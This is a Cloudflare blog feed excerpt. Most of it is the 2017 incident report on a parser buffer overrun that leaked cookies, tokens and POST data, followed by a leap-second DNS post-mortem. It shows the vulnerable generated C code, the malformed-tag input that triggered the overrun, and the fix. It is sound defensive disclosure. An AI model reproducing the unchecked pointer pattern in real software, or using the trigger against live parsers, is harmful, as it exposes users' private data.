      <a href="#how-to-understand-your-risk">
        
      </a>
    </div>
<p>We have tried to quantify the risk to individual customers that their data may have leaked. Generally, the more requests that a customer sent to Cloudflare, the more likely it is that their data would have been in memory and therefore exposed. This is anecdotally confirmed by the 150 customers whose data we’ve found in third party caches. The customers whose data appeared in caches are typically the customers that send the most requests through Cloudflare’s network.</p><p>Probabilistically, we are able to estimate the likelihood of data leaking for a particular customer based on the number of requests per month (RPM) that they send through our network: the more requests sent through our network, the more likely a customer’s data was to be in memory when the bug was triggered. Below is a table of the total anticipated data leak events from 22 September 2016 – 18 February 2017 that we would expect based on the average number of requests per month a customer sends through Cloudflare’s network:</p>
            <pre><code> Requests per Month       Anticipated Leaks
 ------------------       -----------------
        200B – 300B         22,356 – 33,534
        100B – 200B         11,427 – 22,356
         50B – 100B          5,962 – 11,427
           10B – 50B           1,118 – 5,962
           1B – 10B             112 – 1,118
          500M – 1B                56 – 112
        250M – 500M                 25 – 56
        100M – 250M                 11 – 25
         50M – 100M                  6 – 11
          10M – 50M                   1 – 6
              &lt; 10M                     &lt; 1</code></pre>
            <p>More than 99% of Cloudflare’s customers send fewer than 10 million requests per month. At that level, probabilistically we would expect that they would have no data leaked during the period the bug was present. For further context, the 100th largest website in the world is estimated to handle fewer than 10 billion requests per month, so there are very few of Cloudflare’s 6 million customers that fall into the top bands of the chart above. Cloudflare customers can find their own RPM by logging into the Cloudflare Analytics Dashboard and looking at the number of requests per month for their sites.</p><p>The statistics above assume that each leak contained only one customer’s data. That was true for nearly all of the leaks we reviewed from search engine caches. However, there were instances where more data may have been leaked. The probability table above should be considered just an estimate to help provide some general guidance on the likelihood a customer’s data would have leaked.</p>
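<p>The bands in the table above are roughly linear in requests per month. As a back-of-envelope sketch (our own fit to the published numbers, not Cloudflare’s actual model):</p>

```c
#include <math.h>

/* Rough linear fit to the table above: the 1B -> 112 and
 * 200B -> 22,356 rows both imply about K = 1.118e-7 anticipated
 * leaks per request over 22 September 2016 - 18 February 2017.
 * K is our own extrapolation, not Cloudflare's published model. */
static double anticipated_leaks(double requests_per_month)
{
    const double K = 1.118e-7;
    return requests_per_month * K;
}
```

<p>At 10 million requests per month this predicts roughly one leak over the whole period, which matches the bottom bands of the table.</p>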
    <div>
      <h2>Interim Conclusion</h2>
      <a href="#interim-conclusion">
        
      </a>
    </div>
    <p>We are continuing to work with third party caches to expunge leaked data and will not let up until every bit has been removed. We also continue to analyze Cloudflare’s logs and the particular requests that triggered the bug for anomalies. While we were able to mitigate this bug within minutes of it being reported to us, we want to ensure that other bugs are not present in the code. We have undertaken a full review of the parser code to look for any additional potential vulnerabilities. In addition to our own review, we're working with the outside code auditing firm <a href="https://www.veracode.com/">Veracode</a> to review our code.</p><p>Cloudflare’s mission is to help build a better Internet. Everyone on our team comes to work every day to help our customers — regardless of whether they are businesses, non-profits, governments, or hobbyists — run their corner of the Internet a little better. This bug exposed just how much of the Internet puts its trust in us. We know we disappointed you and we apologize. We will continue to share what we discover because we believe trust is critical and transparency is the foundation of that trust.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Privacy]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">4vtfDGhBbFcAQmmbibppaQ</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Incident report on memory leak caused by Cloudflare parser bug]]></title>
            <link>https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/</link>
            <pubDate>Thu, 23 Feb 2017 23:01:06 GMT</pubDate>
            <description><![CDATA[ Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare. ]]></description>
            <content:encoded><![CDATA[ <p>Last Friday, <a href="https://twitter.com/taviso">Tavis Ormandy</a> from Google’s <a href="https://googleprojectzero.blogspot.co.uk/">Project Zero</a> <a href="https://twitter.com/taviso/status/832744397800214528">contacted</a> Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare.</p><p>It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines.</p><p>For the avoidance of doubt, Cloudflare customer SSL private keys were not leaked. Cloudflare has always terminated SSL connections through an isolated instance of NGINX that was not affected by this bug.</p><p>We quickly identified the problem and turned off three minor Cloudflare features (<a href="https://support.cloudflare.com/hc/en-us/articles/200170016-What-is-Email-Address-Obfuscation-">email obfuscation</a>, <a href="https://support.cloudflare.com/hc/en-us/articles/200170036-What-does-Server-Side-Excludes-SSE-do-">Server-side Excludes</a> and <a href="https://support.cloudflare.com/hc/en-us/articles/227227647-How-do-I-use-Automatic-HTTPS-Rewrites-">Automatic HTTPS Rewrites</a>) that were all using the same HTML parser chain that was causing the leakage. 
At that point it was no longer possible for memory to be returned in an HTTP response.</p><p>Because of the seriousness of such a bug, a cross-functional team from software engineering, infosec and operations formed in San Francisco and London to fully understand the underlying cause, to understand the effect of the memory leakage, and to work with Google and other search engines to remove any cached HTTP responses.</p><p>Having a global team meant that, at 12-hour intervals, work was handed over between offices, enabling staff to work on the problem 24 hours a day. The team has worked continuously to ensure that this bug and its consequences are fully dealt with. One of the advantages of being a service is that bugs can go from reported to fixed in minutes to hours instead of months. The industry standard time allowed to deploy a fix for a bug like this is usually three months; we were completely finished globally in under 7 hours with an initial mitigation in 47 minutes.</p><p>The bug was serious because the leaked memory could contain private information and because it had been cached by search engines. We have not discovered any evidence of malicious exploits of the bug, nor any other reports of its existence.</p><p>The greatest period of impact was between February 13 and February 18, with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests).</p><p>We are grateful that it was found by one of the world’s top security research teams and reported to us.</p><p>This blog post is rather long but, as is our tradition, we prefer to be open and technically detailed about problems that occur with our service.</p>
    <div>
      <h2>Parsing and modifying HTML on the fly</h2>
      <a href="#parsing-and-modifying-html-on-the-fly">
        
      </a>
    </div>
<p>Many of Cloudflare’s services rely on parsing and modifying HTML pages as they pass through our edge servers. For example, we can <a href="https://www.cloudflare.com/apps/google-analytics/">insert</a> the Google Analytics tag, safely rewrite http:// links to https://, exclude parts of a page from bad bots, obfuscate email addresses, enable <a href="/accelerated-mobile/">AMP</a>, and more by modifying the HTML of a page.</p><p>To modify the page, we need to read and parse the HTML to find elements that need changing. Since the very early days of Cloudflare, we’ve used a parser written using <a href="https://www.colm.net/open-source/ragel/">Ragel</a>. A single .rl file contains an HTML parser used for all the on-the-fly HTML modifications that Cloudflare performs.</p><p>About a year ago we decided that the Ragel-based parser had become too complex to maintain and we started to write a new parser, named cf-html, to replace it. This streaming parser works correctly with HTML5 and is much, much faster and easier to maintain.</p><p>We first used this new parser for the <a href="/how-we-brought-https-everywhere-to-the-cloud-part-1/">Automatic HTTPS Rewrites</a> feature and have been slowly migrating functionality that uses the old Ragel parser to cf-html.</p><p>Both cf-html and the old Ragel parser are implemented as NGINX modules compiled into our NGINX builds. These NGINX filter modules parse buffers (blocks of memory) containing HTML responses, make modifications as necessary, and pass the buffers onto the next filter.</p><p>For the avoidance of doubt: the bug is <i>not</i> in Ragel itself. It is in Cloudflare's use of Ragel. This is our bug and not the fault of Ragel.</p><p>It turned out that the underlying bug that caused the memory leak had been present in our Ragel-based parser for many years, but no memory was leaked because of the way the internal NGINX buffers were used. Introducing cf-html subtly changed the buffering, which enabled the leakage even though there were no problems in cf-html itself.</p><p>Once we knew that the bug was being caused by the activation of cf-html (but before we knew why), we disabled the three features that caused it to be used. Every feature Cloudflare ships has a corresponding <a href="https://en.wikipedia.org/wiki/Feature_toggle">feature flag</a>, which we call a ‘global kill’. We activated the Email Obfuscation global kill 47 minutes after receiving details of the problem and the Automatic HTTPS Rewrites global kill 3h05m later. The Email Obfuscation feature had been changed on February 13 and was the primary cause of the leaked memory, so disabling it quickly stopped almost all memory leaks.</p><p>Within a few seconds, those features were disabled worldwide. We confirmed we were not seeing memory leakage via test URIs and had Google double check that they saw the same thing.</p><p>We then discovered that a third feature, Server-Side Excludes, was also vulnerable and did not have a global kill switch (it was so old it preceded the implementation of global kills). We implemented a global kill for Server-Side Excludes and deployed a patch to our fleet worldwide. From realizing Server-Side Excludes were a problem to deploying a patch took roughly three hours. However, Server-Side Excludes are rarely used and only activated for malicious IP addresses.</p>
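<p>The filter-chain model can be sketched with simplified stand-ins for NGINX’s buffer types (illustrative structs, not the real <code>ngx_buf_t</code>/<code>ngx_chain_t</code> definitions):</p>

```c
#include <stddef.h>

/* Simplified stand-ins for NGINX's ngx_buf_t / ngx_chain_t.  A filter
 * module receives a linked chain of buffers holding pieces of the HTML
 * response, processes each one, and passes the chain to the next filter. */
typedef struct buf {
    const char *pos;      /* first byte of data in this buffer     */
    const char *last;     /* one past the last byte of data        */
    int         last_buf; /* 1 on the final buffer of the response */
} buf_t;

typedef struct chain {
    buf_t        *buf;
    struct chain *next;
} chain_t;

/* A trivial "filter" pass over the chain: count the bytes it carries. */
static long chain_bytes(const chain_t *in)
{
    long n = 0;
    for (; in != NULL; in = in->next)
        n += (long)(in->buf->last - in->buf->pos);
    return n;
}
```

<p>Each real filter walks the chain the same way, which is why the exact shape of the buffers handed from one module to the next matters so much in what follows.</p>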
    <div>
      <h2>Root cause of the bug</h2>
      <a href="#root-cause-of-the-bug">
        
      </a>
    </div>
<p>The Ragel code is converted into generated C code which is then compiled. The C code uses, in the classic C manner, pointers to the HTML document being parsed, and Ragel itself gives the user a lot of control over the movement of those pointers. The underlying bug occurs because of a pointer error.</p>
            <pre><code>/* generated code */
if ( ++p == pe )
    goto _test_eof;</code></pre>
<p>The root cause of the bug was that reaching the end of a buffer was checked using the equality operator, and a pointer was able to step past the end of the buffer. This is known as a buffer overrun. Had the check been done using &gt;= instead of ==, jumping over the buffer end would have been caught. The equality check is generated automatically by Ragel and was not part of the code that we wrote. This indicated that we were not using Ragel correctly.</p><p>The Ragel code we wrote contained a bug that caused the pointer to jump over the end of the buffer and past the ability of an equality check to spot the buffer overrun.</p><p>Here’s a piece of Ragel code used to consume an attribute in an HTML <code>&lt;script&gt;</code> tag. The first line says that it should attempt to find zero or more <code>unquoted_attr_char</code> followed by (that’s the :&gt;&gt; concatenation operator) whitespace, a forward slash, or a &gt; signifying the end of the tag.</p>
            <pre><code>script_consume_attr := ((unquoted_attr_char)* :&gt;&gt; (space|'/'|'&gt;'))
&gt;{ ddctx("script consume_attr"); }
@{ fhold; fgoto script_tag_parse; }
$lerr{ dd("script consume_attr failed");
       fgoto script_consume_attr; };</code></pre>
            <p>If an attribute is well-formed, then the Ragel parser moves to the code inside the <code>@{ }</code> block. If the attribute fails to parse (which is the start of the bug we are discussing today) then the <code>$lerr{ }</code> block is used.</p><p>For example, in certain circumstances (detailed below) if the web page <i>ended</i> with a broken HTML tag like this:</p>
            <pre><code>&lt;script type=</code></pre>
<p>the <code>$lerr{ }</code> block would get used and the buffer would be overrun. In this case the <code>$lerr</code> does <code>dd("script consume_attr failed");</code> (that’s a debug logging statement that is a nop in production) and then does <code>fgoto script_consume_attr;</code> (the state transitions to <code>script_consume_attr</code> to parse the next attribute). From our statistics it appears that such broken tags at the end of the HTML occur on about 0.06% of websites.</p><p>If you have a keen eye you may have noticed that the <code>@{ }</code> transition also did an <code>fgoto</code> but, right before it, did an <code>fhold</code>; the <code>$lerr{ }</code> block did not. It’s the missing <code>fhold</code> that resulted in the memory leakage.</p><p>Internally, the generated C code has a pointer named <code>p</code> that is pointing to the character being examined in the HTML document. <code>fhold</code> is equivalent to <code>p--</code> and is essential because when the error condition occurs <code>p</code> will be pointing to the character that caused the <code>script_consume_attr</code> to fail.</p><p>And it’s doubly important because if this error condition occurs at the end of the buffer containing the HTML document then <code>p</code> will be after the end of the document (<code>p</code> will be <code>pe + 1</code> internally) and a subsequent check that the end of the buffer has been reached will fail and <code>p</code> will run outside the buffer.</p><p>Adding an <code>fhold</code> to the error handler fixes the problem.</p>
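<p>The effect of the missing <code>fhold</code> can be reproduced in a few lines of standalone C. This is a sketch of the generated-code pattern, not the actual Ragel output:</p>

```c
/* When the error action fires at the end of the buffer, p == pe.
 * Without fhold (p--), the next state's `++p == pe` test is jumped
 * over and the overrun goes undetected.  Sketch only. */
static long end_check(const char *buf, long len, int with_fhold)
{
    const char *pe = buf + len; /* one past the end of the buffer   */
    const char *p  = pe;        /* parser ran out of input: p == pe */

    if (with_fhold)
        p--;                    /* fhold: step back to the last char */

    if (++p == pe)              /* the generated equality-only test  */
        return p - buf;         /* end of buffer detected            */
    return -1;                  /* p == pe + 1: overrun undetected   */
}
```

<p>With the <code>fhold</code>, <code>end_check</code> reports the end of the buffer; without it, the equality test can never fire again and the function falls through, just as the real parser ran off the end of the document.</p>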
    <div>
      <h2>Why now</h2>
      <a href="#why-now">
        
      </a>
    </div>
    <p>That explains how the pointer could run past the end of the buffer, but not why the problem suddenly manifested itself. After all, this code had been in production and stable for years.</p><p>Returning to the <code>script_consume_attr</code> definition above:</p>
            <pre><code>script_consume_attr := ((unquoted_attr_char)* :&gt;&gt; (space|'/'|'&gt;'))
&gt;{ ddctx("script consume_attr"); }
@{ fhold; fgoto script_tag_parse; }
$lerr{ dd("script consume_attr failed");
       fgoto script_consume_attr; };</code></pre>
<p>What happens when the parser runs out of characters while consuming an attribute depends on whether the buffer currently being parsed is the last buffer. If it’s not the last buffer, there’s no need to run <code>$lerr</code>: the rest of the attribute may be in the next buffer, so the parser cannot yet know whether an error has occurred.</p><p>But if this is the last buffer, then the <code>$lerr</code> is executed. Here’s how the code ends up skipping over the end-of-file and running through memory.</p><p>The entry point to the parsing function is <code>ngx_http_email_parse_email</code> (the name is historical; it does much more than email parsing).</p>
            <pre><code>ngx_int_t ngx_http_email_parse_email(ngx_http_request_t *r, ngx_http_email_ctx_t *ctx) {
    u_char  *p = ctx-&gt;pos;
    u_char  *pe = ctx-&gt;buf-&gt;last;
    u_char  *eof = ctx-&gt;buf-&gt;last_buf ? pe : NULL;</code></pre>
            <p>You can see that <code>p</code> points to the first character in the buffer, <code>pe</code> to the character after the end of the buffer and <code>eof</code> is set to <code>pe</code> if this is the last buffer in the chain (indicated by the <code>last_buf</code> boolean), otherwise it is NULL.</p><p>When the old and new parsers are both present during request handling a buffer such as this will be passed to the function above:</p>
            <pre><code>(gdb) p *in-&gt;buf
$8 = {
  pos = 0x558a2f58be30 "&lt;script type=\"",
  last = 0x558a2f58be3e "",

  [...]

  last_buf = 1,

  [...]
}</code></pre>
            <p>Here there is data and <code>last_buf</code> is 1. When the new parser is not present the final buffer that <i>contains data</i> looks like this:</p>
            <pre><code>(gdb) p *in-&gt;buf
$6 = {
  pos = 0x558a238e94f7 "&lt;script type=\"",
  last = 0x558a238e9504 "",

  [...]

  last_buf = 0,

  [...]
}</code></pre>
            <p>A final empty buffer (<code>pos</code> and <code>last</code> both NULL and <code>last_buf = 1</code>) will follow that buffer but <code>ngx_http_email_parse_email</code> is not invoked if the buffer is empty.</p><p>So, in the case where only the old parser is present, the final buffer that contains data has <code>last_buf</code> set to 0. That means that <code>eof</code> will be NULL. Now when trying to handle <code>script_consume_attr</code> with an unfinished tag at the end of the buffer the <code>$lerr</code> will not be executed because the parser believes (because of <code>last_buf</code>) that there may be more data coming.</p><p>The situation is different when both parsers are present. <code>last_buf</code> is 1, <code>eof</code> is set to <code>pe</code> and the <code>$lerr</code> code runs. Here’s the generated code for it:</p>
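<p>A minimal sketch of that <code>eof</code> decision, using a simplified stand-in for <code>ngx_buf_t</code> (field names follow the gdb output above):</p>

```c
#include <stddef.h>

/* Simplified stand-in for the relevant ngx_buf_t fields.  eof is pe
 * only on the last buffer; otherwise it is NULL, which tells the
 * parser that more data may follow and suppresses the $lerr actions. */
typedef struct {
    const char *pos;
    const char *last;
    int         last_buf;
} buf_t;

static const char *eof_for(const buf_t *b)
{
    const char *pe = b->last;
    return b->last_buf ? pe : NULL;
}
```

<p>With only the old parser, the final data-carrying buffer has <code>last_buf = 0</code>, so <code>eof_for</code> returns NULL and the error action never fires; with both parsers present, <code>last_buf = 1</code> and the <code>$lerr</code> path runs.</p>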
            <pre><code>/* #line 877 "ngx_http_email_filter_parser.rl" */
{ dd("script consume_attr failed");
              {goto st1266;} }
     goto st0;

[...]

st1266:
    if ( ++p == pe )
        goto _test_eof1266;</code></pre>
<p>The parser runs out of characters while trying to perform <code>script_consume_attr</code>, and <code>p</code> will be <code>pe</code> when that happens. Because there’s no <code>fhold</code> (which would have done <code>p--</code>), when the code jumps to <code>st1266</code>, <code>p</code> is incremented and is now past <code>pe</code>.</p><p>It then won’t jump to <code>_test_eof1266</code> (where EOF checking would have been performed) and will carry on past the end of the buffer trying to parse the HTML document.</p><p>So, the bug had been dormant for years until the internal feng shui of the buffers passed between NGINX filter modules changed with the introduction of cf-html.</p>
    <div>
      <h2>Going bug hunting</h2>
      <a href="#going-bug-hunting">
        
      </a>
    </div>
    <p>Research by IBM in the 1960s and 1970s showed that bugs tend to cluster in what became known as “error-prone modules”. Since we’d identified a nasty pointer overrun in the code generated by Ragel it was prudent to go hunting for other bugs.</p><p>Part of the infosec team started <a href="https://en.wikipedia.org/wiki/Fuzzing">fuzzing</a> the generated code to look for other possible pointer overruns. Another team built test cases from malformed web pages found in the wild. A software engineering team began a manual inspection of the generated code looking for problems.</p><p>At that point it was decided to add explicit pointer checks to every pointer access in the generated code to prevent any future problem and to log any errors seen in the wild. The errors generated were fed to our global error logging infrastructure for analysis and trending.</p>
            <pre><code>#define SAFE_CHAR ({\
    if (!__builtin_expect(p &lt; pe, 1)) {\
        ngx_log_error(NGX_LOG_CRIT, r-&gt;connection-&gt;log, 0, "email filter tried to access char past EOF");\
        RESET();\
        output_flat_saved(r, ctx);\
        BUF_STATE(output);\
        return NGX_ERROR;\
    }\
    *p;\
})</code></pre>
            <p>And we began seeing log lines like this:</p>
<pre><code>2017/02/19 13:47:34 [crit] 27558#0: *2 email filter tried to access char past EOF while sending response to client, client: 127.0.0.1, server: localhost, request: "GET /malformed-test.html HTTP/1.1"</code></pre>
<p>Every log line indicates an HTTP request that could have leaked private memory. By logging how often the problem was occurring we hoped to estimate the number of HTTP requests that had leaked memory while the bug was present.</p><p>In order for the memory to leak the following had to be true:</p><ul><li><p>The final buffer containing data had to finish with a malformed script or img tag.</p></li><li><p>The buffer had to be less than 4k in length (otherwise NGINX would crash).</p></li><li><p>The customer had to either have Email Obfuscation enabled (because it uses both the old and new parsers as we transition), or Automatic HTTPS Rewrites/Server-Side Excludes (which use the new parser) in combination with another Cloudflare feature that uses the old parser. And Server-Side Excludes only execute if the client IP has a poor reputation (i.e. it does not work for most visitors).</p></li></ul><p>That explains why the buffer overrun resulting in a leak of memory occurred so infrequently.</p><p>Additionally, the Email Obfuscation feature (which uses both parsers and would have enabled the bug on the largest number of Cloudflare sites) was only enabled on February 13 (four days before Tavis’ report).</p><p>The three features implicated were rolled out as follows. The earliest date memory could have leaked is 2016-09-22.</p><ul><li><p>2016-09-22 Automatic HTTPS Rewrites enabled</p></li><li><p>2017-01-30 Server-Side Excludes migrated to new parser</p></li><li><p>2017-02-13 Email Obfuscation partially migrated to new parser</p></li><li><p>2017-02-18 Google reports problem to Cloudflare and leak is stopped</p></li></ul><p>The greatest potential impact occurred for the four days starting on February 13 because Automatic HTTPS Rewrites wasn’t widely used and Server-Side Excludes only activate for malicious IP addresses.</p>
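<p>The preconditions above form a conjunction that rarely holds, which can be expressed as a predicate. The struct, field names, and function here are illustrative only, not Cloudflare’s code:</p>

```c
/* Sketch of the leak preconditions listed above as a predicate.
 * Illustrative types and names, not Cloudflare's actual request
 * representation. */
typedef struct {
    int  ends_with_malformed_tag; /* final data buffer ends in a broken script/img tag */
    long final_buf_len;           /* leak required this to be < 4096 bytes             */
    int  email_obfuscation;       /* feature using both old and new parsers            */
    int  new_parser_feature;      /* Automatic HTTPS Rewrites / Server-Side Excludes   */
    int  old_parser_feature;      /* any other feature still on the old parser         */
} req_t;

static int could_leak(const req_t *r)
{
    if (!r->ends_with_malformed_tag || r->final_buf_len >= 4096)
        return 0;
    return r->email_obfuscation ||
           (r->new_parser_feature && r->old_parser_feature);
}
```

<p>Only requests where every clause is true could leak, which is consistent with the observed rate of roughly 1 in 3,300,000 requests.</p>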
    <div>
      <h2>Internal impact of the bug</h2>
      <a href="#internal-impact-of-the-bug">
        
      </a>
    </div>
<p>Cloudflare runs multiple separate processes on the edge machines and these provide process and memory isolation. The memory being leaked was from a process based on NGINX that does HTTP handling. It has a separate heap from processes doing SSL, image re-compression, and caching, which meant that we were quickly able to determine that SSL private keys belonging to our customers could not have been leaked.</p><p>However, the memory space being leaked did still contain sensitive information. One obvious piece of information that had leaked was a private key used to secure connections between Cloudflare machines.</p><p>When processing HTTP requests for customers’ web sites our edge machines talk to each other within a rack, within a data center, and between data centers for logging, caching, and to retrieve web pages from origin web servers.</p><p>In response to heightened concerns about surveillance activities against Internet companies, we decided in 2013 to encrypt all connections between Cloudflare machines to prevent such an attack even if the machines were sitting in the same rack.</p><p>The private key leaked was the one used for this machine-to-machine encryption. A small number of secrets used internally at Cloudflare for authentication were also present.</p>
    <div>
      <h2>External impact and cache clearing</h2>
      <a href="#external-impact-and-cache-clearing">
        
      </a>
    </div>
    <p>More concerning was the fact that chunks of in-flight HTTP requests for Cloudflare customers were present in the dumped memory. That meant that information that should have been private could be disclosed.</p><p>This included HTTP headers, chunks of POST data (perhaps containing passwords), JSON for API calls, URI parameters, cookies and other sensitive information used for authentication (such as API keys and OAuth tokens).</p><p>Because Cloudflare operates a large, shared infrastructure, an HTTP request to a Cloudflare web site that was vulnerable to this problem could reveal information about an unrelated Cloudflare site.</p><p>An additional problem was that Google (and other search engines) had cached some of the leaked memory through their normal crawling and caching processes. We wanted to ensure that this memory was scrubbed from search engine caches before the public disclosure of the problem so that third-parties would not be able to go hunting for sensitive information.</p><p>Our natural inclination was to get news of the bug out as quickly as possible, but we felt we had a duty of care to ensure that search engine caches were scrubbed before a public announcement.</p><p>The infosec team worked to identify URIs in search engine caches that had leaked memory and get them purged. With the help of Google, Yahoo, Bing and others, we found 770 unique URIs that had been cached and which contained leaked memory. Those 770 unique URIs covered 161 unique domains. The leaked memory has been purged with the help of the search engines.</p><p>We also undertook other search expeditions looking for potentially leaked information on sites like Pastebin and did not find anything.</p>
    <div>
      <h2>Some lessons</h2>
      <a href="#some-lessons">
        
      </a>
    </div>
    <p>The engineers working on the new HTML parser had been so worried about bugs affecting our service that they had spent hours verifying that it did not contain security problems.</p><p>Unfortunately, it was the ancient piece of software that contained a latent security problem and that problem only showed up as we were in the process of migrating away from it. Our internal infosec team is now undertaking a project to fuzz older software looking for potential other security problems.</p>
    <div>
      <h2>Detailed Timeline</h2>
      <a href="#detailed-timeline">
        
      </a>
    </div>
    <p>We are very grateful to our colleagues at Google for contacting us about the problem and working closely with us through its resolution, all of which occurred without any reports that outside parties had identified the issue or exploited it.</p><p>All times are UTC.</p><ul><li><p>2017-02-18 0011 Tweet from Tavis Ormandy asking for Cloudflare contact information</p></li><li><p>2017-02-18 0032 Cloudflare receives details of bug from Google</p></li><li><p>2017-02-18 0040 Cross functional team assembles in San Francisco</p></li><li><p>2017-02-18 0119 Email Obfuscation disabled worldwide</p></li><li><p>2017-02-18 0122 London team joins</p></li><li><p>2017-02-18 0424 Automatic HTTPS Rewrites disabled worldwide</p></li><li><p>2017-02-18 0722 Patch implementing kill switch for cf-html parser deployed worldwide</p></li><li><p>2017-02-20 2159 SAFE_CHAR fix deployed globally</p></li><li><p>2017-02-21 1803 Automatic HTTPS Rewrites, Server-Side Excludes and Email Obfuscation re-enabled worldwide</p></li></ul><p><i>NOTE: This post was updated to reflect updated information.</i></p> ]]></content:encoded>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Privacy]]></category>
            <category><![CDATA[Bugs]]></category>
            <guid isPermaLink="false">nSD8VcIsba3d7IEBQiZPP</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[How and why the leap second affected Cloudflare DNS]]></title>
            <link>https://blog.cloudflare.com/how-and-why-the-leap-second-affected-cloudflare-dns/</link>
            <pubDate>Sun, 01 Jan 2017 22:40:26 GMT</pubDate>
            <description><![CDATA[ At midnight UTC on New Year’s Day, deep inside Cloudflare’s custom RRDNS software, a number went negative when it should always have been, at worst, zero. A little later this negative value caused RRDNS to panic.  ]]></description>
            <content:encoded><![CDATA[ <p>At midnight UTC on New Year’s Day, deep inside Cloudflare’s custom <a href="/tag/rrdns/">RRDNS</a> software, a number went negative when it should always have been, at worst, zero. A little later this negative value caused RRDNS to panic. This panic was caught using the recover feature of the Go language. The net effect was that some DNS resolutions to some Cloudflare managed web properties failed.</p><p>The problem only affected customers who use CNAME DNS records with Cloudflare, and only affected a small number of machines across Cloudflare's 102 data centers. At peak approximately 0.2% of DNS queries to Cloudflare were affected and less than 1% of all HTTP requests to Cloudflare encountered an error.</p><p>This problem was quickly identified. The most affected machines were patched in 90 minutes and the fix was rolled out worldwide by 0645 UTC. We are sorry that our customers were affected, but we thought it was worth writing up the root cause for others to understand.</p>
    <div>
      <h3>A little bit about Cloudflare DNS</h3>
      <a href="#a-little-bit-about-cloudflare-dns">
        
      </a>
    </div>
    <p>Cloudflare customers use our <a href="https://www.cloudflare.com/dns/">DNS service</a> to serve the authoritative answers for DNS queries for their domains. They need to tell us the IP address of their origin web servers so we can contact the servers to handle non-cached requests. They do this in two ways: either they enter the IP addresses associated with the names (e.g. the IP address of example.com is 192.0.2.123 and is entered as an A record) or they enter a CNAME (e.g. example.com is origin-server.example-hosting.biz).</p><p>This image shows a test site with an A record for <code>theburritobot.com</code> and a CNAME for <code>www.theburritobot.com</code> pointing directly to Heroku.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6849XKj9F4rFAMEnAT53RX/4a550069ff1b976af330dafffc087783/cloudflare_dns_control_panel.png.scaled500.png" />
            
            </figure><p>When a customer uses the CNAME option, Cloudflare occasionally has to look up, using DNS, the actual IP address of the origin server. It does this automatically using standard recursive DNS. It was this CNAME lookup code that contained the bug that caused the outage.</p><p>Internally, Cloudflare operates DNS resolvers to look up DNS records from the Internet, and RRDNS talks to these resolvers to get IP addresses when doing CNAME lookups. RRDNS keeps track of how well the internal resolvers are performing, does a weighted selection of the possible resolvers (we operate multiple per data center for redundancy), and chooses the most performant. During the leap second, some of these resolutions ended up recording a negative value in a data structure.</p><p>The weighted selection code, at a later point, was fed the negative number, which caused it to panic. The negative number got there through a combination of the leap second and smoothing.</p>
    <div>
      <h3>A falsehood programmers believe about time</h3>
      <a href="#a-falsehood-programmers-believe-about-time">
        
      </a>
    </div>
    <p>The root cause of the bug that affected our DNS service was the belief that <i>time cannot go backwards</i>. In our case, some code assumed that the <i>difference</i> between two times would always be, at worst, zero.</p><p>RRDNS is written in Go and uses Go’s <a href="https://golang.org/pkg/time/#Now">time.Now()</a> function to get the time. Unfortunately, this function does not guarantee monotonicity. Go currently doesn’t offer a monotonic time source (see issue <a href="https://github.com/golang/go/issues/12914">12914</a> for discussion).</p><p>In measuring the performance of the upstream DNS resolvers used for CNAME lookups, RRDNS contains the following code:</p>
            <pre><code>// Update upstream sRTT on UDP queries, penalize it if it fails
if !start.IsZero() {
	rtt := time.Now().Sub(start)
	if success &amp;&amp; rcode != dns.RcodeServerFailure {
		s.updateRTT(rtt)
	} else {
		// The penalty should be a multiple of actual timeout
		// as we don't know when the good message was supposed to arrive,
		// but it should not put server to backoff instantly
		s.updateRTT(TimeoutPenalty * s.timeout)
	}
}</code></pre>
            <p>In the code above <code>rtt</code> could be negative if time.Now() was earlier than <code>start</code> (which was set by a call to <code>time.Now()</code> earlier).</p><p>That code works well if time moves forward. Unfortunately, we’ve tuned our resolvers to be very fast which means that it’s normal for them to answer in a few milliseconds. If, right when a resolution is happening, time goes back a second the perceived resolution time will be <i>negative</i>.</p><p>RRDNS doesn’t just keep a single measurement for each resolver, it takes many measurements and smoothes them. So, the single measurement wouldn’t cause RRDNS to think the resolver was working in negative time, but after a few measurements the smoothed value would eventually become negative.</p><p>When RRDNS selects an upstream to resolve a CNAME it uses a weighted selection algorithm. The code takes the upstream time values and feeds them to Go’s <a href="https://golang.org/pkg/math/rand/#Int63n">rand.Int63n()</a> function. <code>rand.Int63n</code> promptly panics if its argument is negative. That's where the RRDNS panics were coming from.</p><p>(Aside: there are many other <a href="http://infiniteundo.com/post/25326999628/falsehoods-programmers-believe-about-time">falsehoods programmers believe about time</a>)</p>
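            <p>The panic is easy to reproduce in isolation. The sketch below is illustrative only (the <code>pickUpstream</code> helper is invented, not RRDNS source): it wraps a weighted pick in the same kind of <code>recover</code>, and shows that feeding <code>rand.Int63n</code> a negative bound panics:</p>
            <pre><code>package main

import (
	"fmt"
	"math/rand"
	"time"
)

// pickUpstream is an invented stand-in for a weighted upstream
// selection. rand.Int63n panics if its bound is not positive, so a
// negative smoothed RTT fed to it brings the whole selection down;
// the recover turns that panic into an error.
func pickUpstream(totalWeight time.Duration) (n int64, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("selection panicked: %v", r)
		}
	}()
	return rand.Int63n(int64(totalWeight)), nil
}

func main() {
	// A smoothed RTT that drifted negative after the clock stepped back.
	negative := -50 * time.Millisecond
	if _, err := pickUpstream(negative); err != nil {
		fmt.Println(err) // err reports the recovered panic from rand.Int63n
	}
}</code></pre>
            <p>Recovering at the selection boundary only converts the panic into an error; the underlying problem is the negative sample itself.</p>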
